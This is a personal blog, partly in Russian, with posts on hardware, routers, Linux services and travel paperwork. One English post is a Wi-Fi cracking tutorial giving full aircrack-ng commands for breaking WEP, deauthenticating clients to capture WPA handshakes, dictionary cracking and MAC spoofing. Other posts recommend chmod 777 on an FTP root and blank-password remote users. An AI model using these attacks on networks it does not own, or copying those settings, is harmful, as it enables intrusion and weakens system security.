blogof alexey bass (алексей басс אלכסיי בס)

Решившись брать новый привод взамен еле дышащего старого Optiarc AD-7191S, я полез на forum.ixbt.com.

Начитавшись вдоволь кучу постов, в голове обрисовалась следующая картина:
1. Нет идеального устройства для всего, есть хорошо пишущие (Nec или Pioneer) и хорошо читающие (Lite-On и его клоны); к приближённо-универсальным можно отнести Pioneer;
2. Чем дальше, сложнее найти что-то стоящее. Грамотные люди запасаются проверенными временем моделями в прок (покупают сразу несколько штук ака домашний склад).
3. Грамотные люди ставят 2 устройства: одно для чтения, одно для записи (см п.1);
4. Lite-On делает OEM версии своих продуктов для сторонних фирм типа ASUS, HP - т.е. начинка родная, стикеры - нет. При точном совпадении можно переделать клон в родной лайтон при помощи родной прошивки
5. Все манипуляции с перепрошиванием делаем на свой страх и риск и обычно лишают гарантии - что логично в принципе.
6. Есть популярный ресурс cdfreaks, где есть хорошие обзоры девайсов и мегакодеры дотачивают напильниками заводские прошивки, за что им огромный респект.
7. Привод это половина проблемы - болванки тоже бывают говно полное.
8. Как проверяется: записывается на качественном резаке и проверяется через DVD info tool качество записи
9. Отличная запись - C1 average < 2, C2 = 0; хорошая - C1 average < 10, C2 = 0; Jitter желателен менее 8% (отсюда)

Выследить нужную модель можно с помощью Google Alerts, который о появлении этих моделей в поисковом индексе пришлют вам уведомление на почту или рсс.
Вот пример моих запросов (искал в Израиле)
(nec | sony | optiarc) (ad-7203s | ad-7243s) site:co.il
liteon ihas324 site:co.il
pioneer (dvr-116d | dvr-117d | dvr-216d | dvr-217d) site:co.il -inurl:fxp.co.il

Список рекомендованных девайсов (в основном чёрная лицевая панель и SATA интерфейс):
Lite-On: iHAS-220, iHAS-222, iHAS-224, iHAS-324, iHAS-422, iHAS-424
Pioneer: DVR-116D, DVR-117D, DVR-216DBK, DVR-217DBK
Benq: DW1655
Sony Optiarc (Nec): AD-720xS, AD-724xS
Различия в моделях: AD-7240S, AD-7241S (с LightScribe), AD-7243S (с LabelFlash)

В своём выборе я придерживался стратегии "какие девайсы есть у крутых мемберов на этих форумах (обычно написано в подписи к постам или в профилях) и что из них есть в продаже за доступные мне деньги". В итоге я приобрёл Sony Optiarc AD-7240S и Pioneer DVR-216DBK. Теперь охочусь на Lite-On iHAS-324 (важно заказать iHAS324-08, а не iHAS324-98).

Полезные ссылки:
Читать в первую очередь! Что, чем и как прошивать: ссылки по теме
CD-Recordable FAQ
Советы со всего света
DVD±RW SATA - работает только в PIO
Пример поиска модели Sony Optiarc AD-7240S на форуме через Яндекс (не забываем ставить галочку) и через Гугл
Troubleshooting: Enabling/Checking DMA in Windows Vista, XP, 2000, Me, 9x
F.A.Q. for PC DVD-Writers
The NEC/Optiarc F.A.Q.

По мотивам поста на хабре привожу примерные настройки для более качественного видео в скайпе.

Ищем конфиг скайпа (config.xml) и подправляем видео настройки на что-то подобное

<Video>
<CaptureHeight>480</CaptureHeight>
<CaptureWidth>640</CaptureWidth>
<Fps>25</Fps>
</Video>

Файл конфига Windows XP у меня был в C:\Documents and Settings\<WINDOWS-USER>\Application Data\Skype\<SKYPE-USER>\config.xml

Ссылки:
Skype video calls with high resolution and frame rate
High Quality Video
Хачу ищо!

coDraw
Два Листа
EtherPad

Herts (Matrix lease cars provider) gave me new Mazda 3 not ready for Israel - when you turn lights on (by the law from this month for winter period) - you can't see anything on displays and fuel indicator!

Upd: My fault, you just need to press on that light level control to enable max light during daytime. I found this logic right after I tested Honda Civic Hybrid - it has '-' and '+' buttons, so when you got full level in bars on a panel, pressing '+' again give you max light.

The new way of software updates is update checkers (can use both)

And another cool service for installing software via checkboxes is Ninite - you select programs you want to install from the list and it do that with no pain! But be aware here about all programs will be installed with their defaults (usually suits for most people).

Finally, I starting using this built-in magic.

And here some useful links

Good place to start when you looking for new monitor.

To understand that, we will learn how actually to break them first ;-)

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.

I got Edimax EW-7318USg for ~$30 as recomended devices.

Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.

Simple WEP Crack

Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scan
airodump-ng rausb0

Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method

When no wireless clients exists

Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get some "fragment-0203-180343.xor" file for the next step.

Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec

How to Crack WPA/WPA2

The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap

Other useful stuff

MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But better with
macchanger --mac 00:11:22:33:44:55

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP 10.0.0.1-255

Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16

Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup

Kernel modules control
lsmod | grep 73
modprobe rt73

Trace packets by
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager

Links

aircrac-ng tutorials and faq
Latest nmap

So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.

UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service

Adobe Photoshop Color management for dummies (like me)

VSFTPD and virtual user

I will show you how to install FTP server on RedHat Linux and made virtual user "upload" with password "kuku" for uploading and downloading files.

First, you need to run

[alexey@blogger ~]$ sudo yum install vsftpd

i got version 2.0.1

[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1

than let's backup original config

[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default

now we can edit config for our needs, open vi

[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf

paste the following

listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!

Now we should create virtual users authentication file, you can use Apache's tools.
'-c' creates new file (remove it when adding new users), '-b' will take password from command line

[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default

Now we need to tell how vsftpd should check users, it will use PAM that described in

[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
#%PAM-1.0
auth       required     pam_listfile.so item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth       required     pam_stack.so service=system-auth
auth       required     pam_shells.so
account    required     pam_stack.so service=system-auth
session    required     pam_stack.so service=system-auth

backup it with

[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default

and paste the following

[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth    required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
[alexey@blogger ~]$

At this point you can start deamon with

[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start

and if everything is ok, try to connect to your new FTP.

I was dealing with some problem that even if i use username and password pair I just created, it always was return me "Invalid login". I thought that the problem was in the users file and i rewrited it many time. But it was just pwdfile file missing, that I got from

[alexey@blogger ~]$ sudo tail /var/log/messages
Oct  5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct  5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct  5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/pam_pwdfile.so: cannot open shared object file: No such file
Oct  5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so

All PAM plugins placed in

[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x  1 root root  15560 May 12  2006 pam_access.so
-rwxr-xr-x  1 root root  52334 Oct 13  2004 pam_ccreds.so
-rwxr-xr-x  1 root root   6004 May 12  2006 pam_chroot.so
...

And pam_pwdfile.so was missing :-(
I found it and installed

[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459

Now it is fine, and FTP auth worked!

[alexey@blogger ~]$ ll /lib/security/pam_pwdfile.so
-rwxr-xr-x  1 root root 14572 Jul 30  2004 /lib/security/pam_pwdfile.so

Make sure that FTP root is readable and writable for specified user

[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory


[alexey@blogger ~]$ ftp localhost
Connected to localhost (127.0.0.1).
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$

Information used

This week I made upgrade to my desktop PC - replaced CPU to get performance in graphics, games, whatever.

If CPU choice I made a lot before, the cooler was my headache.
I read about Scythe Ninja 2 half year ago and thought it would be nice to have something alike. How I was happy to know that I can bye exactly this (even revision B) model in Israel for 188 NIS (~$50).

It looks like some fucking japan ninja house and it's weight about 700g fanless (+120g with fan )! Be careful when installing it, i had to put out all case and motherboard to install this ton of copper and aluminum.

(from left to right) Old Intel E5200 Box cooler, new Intel E8400, Scythe Ninja 2 (Rev.B)

The cooler is 100% kickass and do it's job perfectly! Repects goes to Japan guys from Scythe.
Some reviews:
Scythe Ninja 2 Review (Overclockers Club)
Scythe NINJA 2 CPU Cooler Video Review

P.S. Don't forget to reset CMOS settings (or even better upgrade BIOS if there is new). I was wondering, why it's keeping 65-70C. This was because of my prev E5200 was using ~1.3V core and E8400 need only ~1.0V and somehow motherboard can't change it by itself. Now it's around 30C and I even can take away fan for more silence... but hard disk will break it, damn! need another upgrade...

My new game is cheap ($100) GPS device from dealextreme.

Looks like this is YF International 58C-2 DX redesigned.

Quick specs
5" TFT screen, 480x272 pixels
Microsoft Windows CE 5.0 English
CPU Atlas-III 327 MHz
RAM 64 MB
900 mAh lithium polymer battery
SiRF-3 GPS chipset
Comes with 2 GM SD flash card with iGO 8.0.0.54000
FM transmitter
BlueTooth

Useful information

sku.19609 (and similar) GPS Navigator info

Video on YouTube

SystemInfo
Rom version: 7DB82C.YF.F.3.25
Software version: V3.0.9.26
Platform ID: 5946504E44383243
Device ID: 2D2DCE7601002790

Windows says (Active Sync)
Model name: YFPND82C
Firmware version: YFPND82C 5.0

GPS software

PPCWarez (eng)

4PDA (rus)

GPS Underground (eng)

UPDATE (2010/08/19)
Sold after a year of usage, here are my thoughts:
- good for start as first device (others from DealExtreme should be ok too)
- last used with iGO 8.3.4.117940 (Nov 3 2009) and iGO Primo 8.5.9.153031 (Jul 22 2010) - like a charm
- never used BlueTooth and FM transmitter once (before I got leased car finally with MP3 CD support)
- car windshield required upgrade - bad silicon quality and overall holder - doable at home
- car cigar lighter power charger burned 3 fuses untill I solved why - bad quality, fixable in a car
- AC adapter required soldering to start work - bad quality, doable at home
- never saw movies on it
- battery is bad, 10 mins max at min backlight - took 4 AA GP rechargeable batteries and made small travel set with USB connector (4x2700 mAh 1.2V batteriess hold iGO for 4-5 hours on min backlight).
- gets very hot on direct sun in a car - probably, nothing to worry
- this device is a good toy for it's price, when you fix all above
- replaced with sku.37914 cause of better CPU, bigger RAM for next level games ;-)

My iGO configuration files (sys.txt) for this device.

Last week I've passed Zend PHP certification exam because I always wanted it, you know, just for fun. But actually it gave me much more than satisfaction - I learned new things I never used before and organized other topics in my head.

I got 10 mock exams with a voucher and I wanted to do that in January 2009. So I started to prepare myself with testing tools, books and manual. You even can see my mock exams progress. But I've stopped that in a middle and this summer I decided to get this done.

So now, I'm officially Zend Certified Engineer (certificate details) born in Russia, living in Israel ;-)

Resources that can help you to reduce holes in you PHP knowledge:

Zend PHP 5 Certification, Study Guide - must to read
Zend PHP Certification Practice Test Book (PHP 4) - old test and answers, helped me with streams and PDO
Guide to PHP Design Patterns
and, of course, PHP manual with user comments (they sometimes very useful).

Btw, there is not a lot of folks that got ZCE in Israel - 83 at this moment.

Gonna grab some food from fridge

(by Stuart Langfield)

(Bahaii Garden)

Потребовалось мне тут недавно пригласить подругу сестры к нам (в Израиль). В Москве им никто внятно ничего не мог сказать, что для этого нужно. Раньше, до того, как отменили визовый режим, нужно идти в контору, которая работает с нотариусом, чтобы заверить это самое приглашение.

Сейчас всё намного проще, как я выяснил.

Из рекомендации посольства государства Израиль в РФ в связи с вступлением в силу соглашения между Россией и Израилем об отмене гостевых и туристических виз берём основное:

Желательно иметь при себе: авиабилет с датами въезда и выезда; полис медицинского страхования на оказание услуг за рубежом; подтверждение о бронировании гостиницы (если цель поездки- туризм); письмо из медицинского учреждения (если цель поездки - лечение); документы, подтверждающие платежеспособность. Для посещения израильских родственников, друзей или организаций – приглашение, полученное в оригинале или по факсу, или e-mail

Окей, теперь нужно выяснить как выглядит это приглашение (источник - Посол Израиля в России Анна Азари: в будущем году российские туристы установят рекорд)

Москвичка: "Вы ввели новую систему приглашений и никто не знает, как оно должно выглядеть. Кто пишет приглашение, на каком языке и кем оно должно быть заверено?"

Ответ: Израиль не вводил каких-либо новых систем приглашений. Если Вы планируете навестить друзей или родственников, посольство Израиля рекомендует - но не обязывает - иметь при себе присланную письмом, по факсу или по электронной почте ксерокопию удостоверения личности израильского друга или родственника. На той же странице приглашающее лицо сообщает (желательно - на иврите или английском языке) свой адрес в Израиле, имя, фамилию и сроки пребывания гостя. Заверений у нотариуса не требуется. Если гость планирует остановиться в гостинице, советуем взять с собой подтверждение о бронировании номера.

Всё равно не совсем понятно, что именно писать. Смотрим дальше (источник - В Израиль без визы)

Как это самое приглашение писать? Что должно быть указано? На каком языке? И т.п.Дискуссия в сообществе

Копия т.-з., приглашение на иврите (английском) от руки, текст пита: "я, такой-то, т-з номер ..., проживаю там-то, телефон для связи такой-то, приглашаю к сеюе в гости такого-то и такого-то на срок такой-то". Раньше ещё дописывали фразы про "расходы по пребыванию беру на себя, своевременный выезд из Израиля гарантирую", как теперь - не знаю, можно и написать. Всё это отправляется факсом или по электронке в Россию приглашаемым, они берут билеты (туда-обратно!) и летят к вам.

Всё было бы намного проще, если бы израильские адвокаты на своём сайте не занимались хуйнёй, а просто бы отвечали на вопросы. Единственный мотив, по которому они не отвечают - чтобы захапать больше денег себе, когда в итоге люди будут вынуждены придти к ним за помощью. Тогда нахрена сайт? Ответ - для своей рекламы.

Вот ответы с этого форума:

Хочу типа клаксона что-нибудь. Не знаю где найти в Израиле :-(

Наткнулся на прикольную коллекцию велосипедных звонков, супер прикольные штуки. Пока нету велика, ты замечаешь, что дизайн есть даже в таких простых вещах.

Прокатился из дома до работы и обратно, всё вместе около 5 километров. Надо привыкать к велику, так как лет 5 (если не больше) не катался :-)

А теперь по теме:

Скорости переключаются плавно, без каких либо косяков (пока велик новый :-).
Сидушка поначалу вбивалась моим телом (мягким местом) вниз на скачках с бордюра и на него - подтянул крепление, всё стало на свои места.
Отсутствие амортизаторов даёт о себе знать даже на мелких кочках.
Лучше ездить по асфальту, чем по выложенной камнем пешеходной дороге.
Красный цвет и модный велик привлекают внимание прохожих.
Нужно купить звонок (лучше гудок), чтобы шугать прохожих.
Выезжать лучше пораньше, пока солнце не печёт и возвращаться попозже. Пока знаю как решить первую проблему - можно принимать душ на работе. Возвращаться позднее 9-10 рабочего дня особо нет желания, надо думать.

Пока всё.

Давно хотел велосипед... Как приехал в Израиль в 2004 году, так и стал хотеть.
Вяло так, осторожно, но хотел.

В общем :-), на прошлой неделе зашёл случайно в веломагазин Trek в Нетании и тут я и решился наконец.

Причём, если раньше я мечтал о горном велике, чтобы с кем-нибудь кататься, то тут я увидел городские складные велосипеды Dahon. У меня, кстати, в детстве был Салют-С между прочим.

(на фотке не я)

Было всего 4 модели: Eco 3, Speed D7, Vitesse D7 и (вроде) Mu P8.

Покрутился, пощупал и ушёл.

Вернулся в пятницу, чтобы купить. Просто захотелось (и деньги были). Выбрал Speed D7, но он был последний на витрине, а мне хотелось самому достать это чудо из коробки. Договорились, что в воскресенье они привезут новенький специально для меня.

Немного технических данных:
7 скоростей
вес 12.5 киллограм
время сборки/разборки - 15 секунд
рама - сверхлегкий сплав хрома и молибдена
отлично влезает в багажник, и ещё остаётся куча места
можно в автобус заносить (в электричку)

В полной боевой готовности

В собранном виде

Сегодня после работы забрал свою новую игрушку. Очень доволен.

Надумал (пока ждал его) варианты использования:
Дорога до работы - пешком 30 минут, а на велике - завтра проверю :)
Езда по городу, когда в лом заводить машину, а хочется подвигаться.
Поездки в Тель Авив - машину теперь можно парковать где-нить бесплатно во дворах и педалить, педалить
Можно деду моему давать ездить на работу, когда пешком тяжело.
Одни профиты ок

Сборка и разборка этого красавца:

Российский сайт Даона (не использовал в тексте ввиду не полного содержания и кривого перевода контента).

(з.ы. на картинке Speed P8, а не Speed D7, потому что не нашёл красного)

Купил сегодня с рук Canon EF 50mm F/1.8 II в нагрузку с блендой Canon ES-62и UV-фильтром hama 52mm.

Отдал 300 шекелей ($77) (новый объектив один стоит 500 шек ($128)) за всё милой девушке, которая купила его полтора года назад и пользовалась совсем чуть-чуть для своей дипломной работы. Сейчас она снимает беременных женщин… (О_о)

Ссылки по теме — что и как нужно проверять

Work under regular users

When you are installing Windows, it asks you to choose password for Administrator - most powerful user on the system. Pick good one here because there is a lot of lists of common password on the web.

Using regular user instead of Administrator helps to defend your system versus a lot of viruses and other shit that requires admin privileges to inject their code to system files (registry, etc). Normal user doesn't have them.

Administrator usually need only for software install, problem fix. Nova days, all software is build in the way it can work with non-admin user.

Google: administrator account on welcome screen windows xp

Disable Autorun
For disks and flash drives. A lot of unwanted software come this way.
Quick way is to disable Shell Hardware Detection service in services.msc, but better - use system policies.
How to disable the Autorun functionality in Windows
Google: disable autorun windows xp

Use Anti-Virus
Even free one, better - get one of them that most likely can protect.
Or you can once a week run for free online scan tool for almost all of known anti-virus products.

Remote Desktop

I usually create limited users with blank passwords and to enable to logon in their profiles from remote machines, you should fix following messages — Unable to log you on because of an account restriction. and The local policy of this system does not permit you to logon interactively

Security and sharing files

Sharing files over network and with local users

How to take ownership of a file or a folder in Windows XP

How to change system time or open a calendar

Run "gpedit.msc" > Computer Configuration > Windows Settings > Security Settings > Local Policies > User rights asignment > Change the system time > Add usernames there or add "Everyone"

Grant access to power settings for local users

Problems with power options

Configuring power settings for users

How to leave only default administrator account

How i can delete administrator user account other than default administrator user account?

View Larger Map

Some info by recently lunched Wolfram (alpha).

See their Help Center for more details.
That is sad and mean that I was a one from 0.5% of this feature users.

Very funny «Pulp Fiction»-style about IE6 — Pulp Browsers.

And to continue, from Habrahabr:
— Whose box is this?
— It's a border-radius, baby
— Whose border-radius is this?
— It's IE6's
— Who is IE6?
— IE6 is dead, baby, IE6 is dead!

We've had fun with Shorashim group (on hebrew) on April 6th last week. Cisco Systems (Israel) was helping to this volunteering organization to deliver «food boxes» this year on Passover. Over 800 were happy to get it. We too ;-)

Pictures:
My (crapy) photos
Flickr stream (primarily by Giora P.)
From Picasa by Tsur Richter-Levin

«The Network Time Protocol (NTP) is a protocol for synchronizing the clocks of computer systems over packet-switched, variable-latency data networks» as Wikipedia says.

Recently, I've got serious issue in production machine — system clock goes crazy, i saw almost 3 hours in past. Even one minute can be important on production environment where you have database and other services running. So I wrapped up here all information i found for future cases ;-)

Let's take a look on default step (first step) you need to do to check out how NTP is works. You should run ntpq —p or ntpq —pn.

alexey@ibm:~$ ntpq -pn
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*212.235.102.46  129.6.15.28      2 u  109 1024  377   17.743  -40.749   0.296

Let's see review each column:

An asterisk * in the first column marks the reference time source which is currently preferred by the NTP daemon, the + character marks high quality candidates for the reference time which could be used if the currently selected reference time source should become unavailable. The x indicates a false ticker - a server whose time is just plain wrong
The column remote displays the IP address or the host name of the reference time source, where LOCAL refers to the local clock.
The refid shows the type of the reference clock, where e.g. LOCAL or LCL refers to the local clockagain, .DCFa. refers to a standard DCF77 time source, and .PPS. indicates that the reference clock is disciplined by a hardware pulse-per-second signal. Other identifiers are possible, depending on the type of the reference clock.
The column st reflects the stratum number of the reference time source. In the example above, the local clock has stratum 12, the remote time server at 172.16.3.103 has stratum 1 which is the best you can see across the network, and the local radio clock has stratum 0, so the radio clock is currently being preferred.
t (type?) - u: unicast, b: broadcast, l: local
Every time a when count reaches the poll number in the same line, the NTP daemon queries the time from the corresponding time source and resets the when count to 0. The query results of each polling cycle are filtered and used as a measure for the clock's quality and reachability.
The column reach shows if a reference time source could be reached at the last polling intervals, i.e. data could be read from the reference time source, and the reference time source was synchronized. The value must be interpreted as an 8 bit shift register whose contents is displayed as octal values. If the NTP daemon has just started, the value is 0. Each time a query was successful a '1' is shifted in from the right, so after the daemon has been started the sequence of reach numbers 0, 1, 3, 7, 17, 37, 77, 177, 377. The maximum value 377 means that the eight last queries were completed successfully. The NTP daemon must have reached a reference time source several times (reach not 0) before it selects a preferred time source and puts an asterisk in the first column.
The delay value is derived from the roundtrip time of the queries.
The offset value shows the difference between the reference time and the system clock.
The jitter value indicates the magnitude of jitter between several time queries.

Continue reading here

Some links about internet music search

Listen music

Grooveshark

Очередной экспонат у меня в руках :-) — Linksys WRT400-G2.

Про него не так уж и много информации, самый полезный пост нашёл в рунете на iXBT — OLraf: Linksys WRP400. Общяя информация, тех данные, вопросы.

Если кратко — 360 МГц процессор, 32 МБ памяти и 8 МБ флеша там не спроста. Помимо 4 100 Мб портов и Wireless B/G у него есть поддержка VoIP. Пока ребята из OpenWRT пытаются его поломать, я попробовал именно «позвонить на халяву», благо это позволяют тестовые звонки довольно таки солидного оператора Sipnet.

Настройка довольно таки тривиальная, подсмотрена в их вики. Перед этим нужно обязательно зарегистрироваться у них — секундное дело, даже почту не нужно вводить О_о. Сайт симпотный, но местами не продуман — ссылку на вики вообще нашёл через гугл, хотя она всегда должна висеть где-нибудь сверху, даже в кабинете пользователя.

В общем, позвонили в москву по тарифу $0.08, что в 2 раза дешевле нашего израильского межгорода (013). Качество связи отличное, лучше чем мы обычно слышим. Там в вики есть табличка с кодеками, которыми сжимается речь при передаче. Я пробовал G.711 — самый качественные и, естественно, требовательный к «ширине» канала — 64 кбит/с. Завтра попробуем позвонить в Братск. Если понравится, надо будет думать как занести деньги им на счёт с наименьшими потерями.

Коробочка чудесная, если не считать раздражающий писк —(можно закинуть куда-нибудь подальше) и супер-неудобный-ебучий линксисовский веб-интерфейс. Самая тема — это настройки именно голосовой связи — тупо сделали 6 страниц по 100 параметров на каждой без пояснени, только технические названия. Явно наспех делали да ещё и для CC**-гиков. А, ещё пластик ужасно вонючий — буэээ.

Другие ссылки по роутеру

Ещё по настройке VoIP для Sipnet

Sometimes I need temporary e-mail account just for pass some forum registration. Sure, I don't want to sign in with my lovely e-mail box to just avoid spam messages.

That's about it. All you need is to go to one of the following links and register an e-mail for, say, 10 minutes. And we're done with registration.

This post is a collection of such links, cause I'm always forget them.

So, here are links

Sources:

Хаха… Что-то меня пробило на роутеры. Ну а так как я работаю в Cisco Systems, то попадаются мне только Linksys'ы ;-) С другими я не имел такого тесного общения.
Итак, встречаем — Linksys WRVS4400N.

Очень интересная начинка (кратко):

4 гигабитный порта
Wireless N-draft
VPN и QoS
2 процессора, 64 МБ оперативной памяти, 8 МБ флеш-памяти

Первый процессор STAR 9109 загружает линукс, имеет доступ в 32 МБ памяти, управляет Marvell WLAN чипсетом, гоняет hostapd и управляет шифрованием. Соединён с основным через гигабитный мост. Основной ЦПУ STAR 9202 подсоединён к Vitesse VSC7385 (SparX G5), который управляет гигабитным свичем. Главный проц может оперировать 64 МБ памяти и 8 МБ флеша. Самое интересное, каждый проц работает со своей операционной системой, то есть, там два линукса одновременно, и общаются они через гигабитный канал.
Меня интересовало — будет ли на нём работать мои уже любимые прошивки DD-WRT или Tomato. Ответ отрицательный. Пока никто не поддерживает эту железку, кроме индусов, которые пишут родную глючную прошивку.
Материал по теме:

Документы, которые смог найти в сети одним архивом (7.5 МБ), внутри:

фотки внутренностей
user guide v2 (6.5 МБ) или на сайте сиско
data sheat

Жаль :-(, выглядит так аппетитно. Попытаюсь на выходных покапать в сторону самостоятельного сбора образа для роутеров. Чо-то мне вдруг интересно стало.
Судя по отзывам, его лучше использовать как внутренний свич, то есть внешним поставить WRT54GL с «нормальной прошивкой», а внутри этот с отключенным IPS.

Такая тема, всё началось со статьи на хабре, в которой говорилось о том, как из дешёвого роутера сделать «конфетку». Об этом и пойдёт речь.

Как случайно оказалось, роутер, на который можно поставить подобную прошивку оказался у моего отца — Linksys WRT54GL. У него процессор с частотой 200 МГц, 16 МБ ОЗУ и 4 МБ флеш памяти для прошивки. Долго смеялся над 16 МБ, пока сам не увидел что он вытворяет потом :-) Мы договорились, что я возьму «поиграться», а взамен я дам ему свой навремя — 3com OfficeConnect 3CRWE554G72T (теперь для меня это «тупая железяка»).

Как только я прошил DD-WRT и «пощупал», я уже знал, завтра я куплю себе такой же девайс :-) Да и стоит он не бешеных денег — взял за 340 шекелей (примерно $75) в своём любимом пандасе с гарантией на 12 месяцев.

Единственное, на что нужно обратить внимание при покупке, это взять уже проверенную ревизию железа, которая указана на днище аппарата. На текущий момент, прошивки опробованы на версии 1.0 (стартовая) и 1.1 (с мая 2008). Мне отказали в просьбе открыть упаковку, чтобы проверить. В вики я нашёл соответствия с серийных номеров (которые указаны на упаковочной коробке) с версией железа. В частности у 1.1 серийник начинается на «CL7B» или «CL7C».

Итоги эксперимента

Прошил DD-WRT v24 (05/24/08) mini, standart
Чуть не угробил свежекупленный роутер, научился заливать прошивку через TFTP
Прошил Tomato v1.23
Уже купил карту памяти и кард-ридер для SD/MMC мода, но посмотрев на плату, решил не рисковать, потому что особого смысла не видел в этом
Добавил вставки между лампочками, потому что в Linksys'е в упор не видят, что свет от соседних диодов попадает в соседние отверстия и кажется что вообще все диоды горят

Я бы не узнал про Tomato, если бы в DD-WRT не работал L2TP дозвон, который нужен был отцу. У меня дома нету дозвона, модем сразу выдаёт IP, и это, я считаю, в сто раз удобнее. Провайдеры у нас да — разные. Поиски по форумам навели меня на баги в DD-WRT, и я оказался не один с проблемой дозвона, особенно в Израиле :-) Там все посоветовали перешить Tomato, что я и сделал.

После всех экспериментов, субъективно понравилась прошивка Tomato, но с дизайном у них конечно каша. Оба участника эксперимента хвастаются AJAX'ом. Tomato хорошо оптимизирован по трафику, чего не скажешь о DD-WRT. Пока понаблюдаю за двумя этими установками, но уже присматриваюсь к Tomato.

